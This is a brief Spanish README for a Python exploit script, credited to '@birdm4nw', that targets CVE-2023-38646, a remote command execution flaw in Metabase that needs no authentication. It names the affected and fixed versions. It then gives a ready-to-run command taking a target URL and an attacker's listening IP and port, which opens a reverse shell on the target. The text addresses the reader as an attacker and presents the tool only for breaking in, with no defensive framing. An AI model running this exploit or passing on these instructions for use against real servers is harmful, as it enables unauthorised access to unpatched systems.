
Este script está diseñado para explotar versiones vulnerables del software Metabase, proporcionándote una shell como atacante.
Metabase de código abierto anterior a 0.46.6.1 y Metabase Enterprise anterior a 1.46.6.1 permiten a los atacantes ejecutar comandos arbitrarios en el servidor, con el nivel de privilegios del servidor. No se requiere autenticación para la explotación. Las otras versiones corregidas son 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2 y 1.43.7.2.
Si la versión de Metabase es vulnerable, este script te permitirá, como atacante, obtener una conexión de shell en el sistema objetivo.
python3 CVE-2023-38646.py -u targetURL -lhost LISTEN_IP -lport LISTEN_PORT

Autor: @birdm4nw